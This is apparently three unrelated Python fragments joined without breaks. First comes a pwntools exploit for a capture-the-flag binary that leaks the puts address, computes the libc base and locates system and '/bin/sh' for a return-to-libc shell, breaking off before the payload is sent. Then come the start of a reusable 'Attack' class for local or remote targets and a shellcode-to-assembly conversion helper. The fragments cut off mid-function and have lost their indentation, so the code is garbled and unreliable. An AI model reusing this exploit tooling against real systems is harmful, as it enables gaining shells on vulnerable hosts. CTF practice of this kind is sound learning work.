#! /usr/bin/env python
from pwn import process, log, context, p32, u32
from pwn import ELF
context.clear(arch='i386', os='linux')
def main():
elf_name = '/problems/got-2-learn-libc_2_2d4a9f3ed6bf71e90e938f1e020fb8ee/vuln'
libc_name = 'libc.so.6'
elf = ELF(elf_name)
libc = ELF(libc_name)
OFFSET_buf_to_eip = 0x9c + 4
p = process(elf_name)
p.recvuntil('puts: ')
leak = p.recvline(keepends=False)
ADDR_puts = int(leak, 16)
p.recvuntil('useful_string: ')
leak = p.recvline(keepends=False)
ADDR_bin_sh = int(leak, 16)
# Calculate libc base
libc.address = ADDR_puts - libc.symbols['puts']
ADDR_system = libc.symbols[
'system'] # + 3 # +3 to avoid null byte on address
ADDR_exit = libc.symbols['exit']
log.info("puts @ %s", hex(ADDR_puts))
log.info("libc @ %s", hex(libc.address))
#! /usr/bin/env python
import os
#
from pwn import context, p64, u64, log, process, remote, args
from pwn import gdb, ELF
context.clear(arch='amd64', os='linux')
HERE_DIR = os.path.dirname(os.path.abspath(__file__))
class Attack:
def __init__(self, host, port, elf_name, libc_name=None, lib_path=None, ld_linux_name=None, gdb_script=None):
self.host, self.port = host, port
self.elf_name, self.libc_name = elf_name, libc_name
self.lib_path = lib_path
self.ld_linux_name = ld_linux_name
self.gdb_script = gdb_script
self.elf = ELF(self.elf_name)
if libc_name:
self.libc = ELF(self.libc_name)
self.p = None
def get_process(self, ld_preload=False, ld_linux=False):
p = None
if args.REMOTE:
p = remote(self.host, self.port)
The transpiler module is responsible for converting shellcode into x86 asm and
vice versa.
"""
#pylint: disable=wrong-import-position
import os
import sys
MODULE_DIR_NAME = os.path.dirname(os.path.realpath(__file__))
if MODULE_DIR_NAME not in sys.path:
sys.path.insert(0, MODULE_DIR_NAME)
from pwn import asm, context, disasm, unhex
context.clear(arch='i686')
context.clear(os='linux')
def shellcode_to_asm(shellcode, byte=True, offset=True):
'Convert shellcode into x86 asm code.'
return disasm(shellcode, byte=byte, offset=offset).split('\n')
def asm_to_shellcode(asm_code, vma=0):
'Convert x86 asm code into shellcode.'
return asm(asm_code, vma=vma)
